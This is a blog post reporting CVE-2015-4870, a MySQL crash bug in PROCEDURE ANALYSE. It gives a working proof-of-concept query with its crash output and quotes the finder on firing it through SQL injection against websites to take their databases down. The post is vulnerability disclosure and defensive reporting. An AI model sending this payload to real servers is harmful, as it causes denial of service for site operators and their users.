MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

Sri Lankan Security researcher Osanda Malith discovered a DoS -or crash- vulnerability in MySQL’s Procedure Analyse Function. The vulnerability crashes MySQL versions up to 5.5.45.

MySQL DoS/crash vulnerability details #

Osanda Malith found this crash in the function procedure analyse() while passing a sub query. It’s syntax:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an example POC would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server
 
mysql>

On Windows, this crashes mysql.exe and an administrator needs to restart the MySQL service. In Windows based systems in a single request the process will crash. We have to manually restart the MySQL server. In *nix systems mysqld will automatically recover but still if we keep on sending multiple GET requests with this payload the database will crash.

Taking advantage (exploiting the crash bug) #

Osanda Malith writes:

If you came across a website vulnerable to SQL injection you can simply perform a DoS attack so that MySQL server will not respond and the entire database of the website would be down meaning the website will be no longer in an active state.
In Windows based systems in a single request the process will crash. We have to manually restart the MySQL server.

This sounds like a very nasty side-affect of SQL injection vulnerability. In August 2014 I wrote about MySQL sleep() attacks being carried out in the wild. Here an attacker injects sleep(3) into a vulnerable web application, making mysqld sleep for the given amount of time, for every record found -depending on where the sleep() is injected of course. That was a Denial of Service attack on the whole MySQL server, quickly consuming all available connections.

This may interest you:   Block WordPress comment spammers manually

This crash/DoS vulnerability however, requires only one request for MySQL on Windows Server, to crash mysql.exe, and a continuous stream of requests for Linux/Unix operating systems because the mysqld service will automatically recover.

Full MySQL Vulnerability details blog post #

Read the full details in Osanda Malith’s blog post.


Show your support


If you want to step in to help me cover the costs for running this website, that would be awesome. Just use this link to donate a cup of coffee ($5 USD for example). And please share the love and help others make use of this website. Thank you very much!


About the Author Jan Reilink

My name is Jan. I am not a hacker, coder, developer, programmer or guru. I am merely a system administrator, doing my daily thing at Vevida in the Netherlands. With over 15 years of experience, my specialties include Windows Server, IIS, Linux (CentOS, Debian), security, PHP, websites & optimization.

follow me on:

Leave a Reply

Be the First to Comment!

avatar
  Subscribe  
Notify of